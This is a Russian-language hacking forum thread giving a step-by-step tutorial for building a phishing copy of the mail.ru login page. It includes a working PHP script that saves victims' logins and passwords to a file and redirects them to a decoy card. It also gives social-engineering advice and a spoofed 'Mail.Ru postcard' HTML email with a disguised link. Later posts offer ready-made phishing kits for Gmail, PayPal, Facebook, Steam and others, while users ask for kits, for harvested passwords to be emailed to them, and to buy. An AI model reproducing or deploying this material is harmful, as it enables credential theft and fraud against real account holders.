Все о хакинге

Объявление

Много прикольного видио рекомендую!!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Все о хакинге » Фейки » Как создать самому фейк


Как создать самому фейк

Сообщений 1 страница 8 из 8

1

но все же решил написать статейку о том, как изготовить Фейк самостоятельно , даже если вы не знакомы ни с PHP ни с HTML . И так, для примера возьмем один из распространенных почтовиков, а иммено www.mail.ru и будем делать подложную страничку АВТОРИЗАЦИИ .
1. Создадим файл index.php :
Для этого запускаем браузер ( я буду работать в Opere). Идем по ссылке http://win.mail.ru/cgi-bin/login , перед вами загрузилась страница Авторизации .
Далее жмем - "Вид", в ниспадающем меню выбираем строку "Исходный текст" - жмем. Перед вами открылось новое окно с человеконепонятным текстом гы-гы-гы)) Все нормально, нам это и нужно... Теперь в этом новом окне жмем "Правка", затем жмем "Выделить все" опять жмем "Правка" и "Копировать". Фух.. не надоело тыкать ? А мну надоело ((( Тогда открываем Блокнот и жмем Ctrl+V . Все, наш текст в блокноте приступим к его редактированию. Теперь нам необходимо найти следующую строку

Код:
<form method="post" action="auth" onSubmit="return CheckForm(this);">
и заменить
на

Код:
<form method="post" action="654321.php" onSubmit="return CheckForm(this);">
(подсказка: жмем Ctrl+H , далше собразите сами)
И стираем три строки кода в которых содержится hidden они распологаются ниже
вот они:

Код:
<input type="hidden" name="page" value="">

<input type="hidden" name="post" value="">

<input type="hidden" name="login_from" value="">
Теперь сохраняем файл с именем index.php .

2. Теперь создадим скрипт отвечающий за запись переменных Login, Password и Domain - 654321.php
Открываем блокнот и создаем там файл со следующим содержанием:

Код:
<?PHP

$Login = $_POST['Login'];Логин
$Domain = $_POST['Domain'];//Домен
$Pass = $_POST['Password'];//Пароль
$c = "$Login@$Domain:$Pass";
$fp = fopen("654321","a+"); //открыть файл базы
fwrite($fp,"\n $c <br> \n");//записываем все
fclose($fp); //закрываем
header("Location: http://cards.mail.ru/card.html?cd=00dcf … e17f");
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"//куда пошлем пользователя после того как он ввел данные!

?>
а пошлем мы его на заранее подготовленную открытку....этот момент очень важен, жертва не должна ничего заподозрить.
3. Теперь сздадим файл базы - 654321 куда будут сливатся Login, Password и Domain. Для этого открываем Блокнот и сохраняем пустую страничку с именем 654321.

Все фейк готов полностью осталось только залить его на хостинг и присвоить PHP скриптам права 755 , а файлу базы права 777.

Результат работы можете посмотреть сдесь:НАШ ФЕЙК

На этом пожалуй можно было бы и закончит статью.... Но думаю, что без примера, как заставить жертву зайти на подложную страничку, статья была бы не полной. Поэтому продолжу повествование.

И так, тут нам понадобиться вся мощь нашего серого вещества и немного Соц инженерии, а может и наоборот немного серого вещества и вся мощь Соц инженерии зы))). Первое что надо помнить, Жертва тоже человек, а значит думает так же как и Вы )))) гы-гы-гы)) ну почти как Вы))
а посему представте что вам приходит письмо от неизвестного человека. Вы будете смотреть ? Лично я нет... и от различных сомнительных сервисов тоже не буду. А значит писать надо от имени почтового сервиса на котором сидит жертва.. А что для этого нужно? А нужно изучить почтовый сервис какие рассылки он отправляет, какие услуги представляет, не плохо бы знать и о самом юзере (жертве) это сильно упростит задачу..мона просто прислать открытку к дню рождения от имени почтового сервиса.. это не вызывает подозрений...можно прислать приглашение на сайт знакомств, для парней от имени девушки , для девушек от имени парней (такое присутствует на mail.ru) ...можно прислать, что угодно, но это должно быть интересное или от имени почтового сервиса на котором сидит жертва !!!! Вобщем тут думайте сами.. у вас есть на это голова))) Теперь о технической стороне .. для того , что бы отправить от имени почтового сервиса Вам прийдется воспользоватся анонимной отправкой почты таких сервисов полно в инете, к примеру можно воспользоватся вот этим http://never-mind.ru/sendmail/ . Письмо нужно составлять в html формате иначе вы не скроете ссылку на подложную страничку. Вобщем ближе к телу , как говорил Ги.Де. Мопасан, привожу пример письма для просмотра открытки, раз уж мы стали делать фейк на мейле.

Код:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td>
<div id=let_body><base href="http://win.mail.ru/cgi-bin/readmsg"><table cellspacing=0 cellpadding=5><tr valign=top>
<td><a href="http://cards.mail.ru" target="_blank"></a></td>
<td><font color="#333333" face="Arial" size="2">

Здравствуйте, на Ваше имя отправлена открытка.

Отправитель открытки: <a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a>

Открытку Вы можете посмотреть в течение 90 дней по ссылке

<a href="http://priz.croe.net./" target="_self"><font color=#0857A6>http://cards.mail.ru/card.html?cd=00dcfed993b461be466bcca05114e17f</font></a>

Нажмите на неё, чтобы попасть на страницу с открыткой.

<hr align="left" color="silver" size="1" width="100%">
Чтобы своевременно узнавать о ближайших праздниках, именинниках и конкурсах,

<a href="http://content.mail.ru/pages/p_782.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> подпишитесь на рассылку</a>.

<a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><font color="#0857a6">Открытки@Mail.Ru</font></a> - открытки на все случаи жизни!<br><br><br>

</font></td></tr></table>
данный код вставляем в окно СООБЩЕНИЕ, в строке ОТ КОГО пишем Cards@mail.ru, в строке ТЕМА пишем ОТКРЫТКА и жмем отправить.

Не забудте только за ранее подготовить открытку , это важный момент !!!! Именно на нее мы будем отправлять жертву в файле 654321.php У жертвы не должно возникнуть сомнений, она должна получить то, что хотела увидеть и Вы должны увидеть то, что хотели гы-гы-гы )))
Ну вот и ВСЕ... хотя нет, забыл сказать о уязвимости... дабы самим не попастся, запомните единственное правило : ВСЕГДА ПРИ АВТОРИЗАЦИИ СМОТРИТЕ АДРЕСНУЮ СТРОКУ!!!!!!!! Подложный сайт можно увидеть только в ней.

0

2

Вот и готовые фейки следущих сайтов:
AOL.com - AIM
DailyMotion.com
EverQuest Forum
fakevkontakte-2 шт
Gmail.com
Google
Habbohotel.com
ICQ.com
d2jsp
eBay.com
FaceBook.com
FileFront.com
Gmail.de
Habbo.de
hotmail
Itunes
mail
Megaupload.com
Myspace
Odnoklassniki
Oxedion
PayPal.com
Plesk
rambler
mail.ru
MMOCheats
Nexon.net
OGame.de
Packstation
PhotoBucket.com
pochta
RapidShare.com
RapidShare.de
siteworld.de
Steam Phishing Site
tutbu
VanGuard
Yandex
Ripway.com
Skype.com
Strato
Usenext
Yahoo.com
YouTube.com
Пишите выложу что надо

0

3

VoR@N написал(а):

Пишите выложу что надо

пипец как надо взломать анкету на этом сайте spaces.ru

0

4

можете выложить фейку для Odnoklassniki

0

5

выложите для одноклассников, только рабочий, и как готовый фейк сделать чтобы логин и пароль жертвы присылался на почту ко мне, заранее спасибо!

0

6

Сможешь создать для онлайн игры, буду очень благодарен...
   --- www.carnage.ru ---

0

7

Сможешь выложить фейк на hotmail(us), буду очень благодарен.

0

8

Привет брат)Можешь дать скайп хочу фейк купить!

0


Вы здесь » Все о хакинге » Фейки » Как создать самому фейк


Создать форум бесплатно! pwbb.ru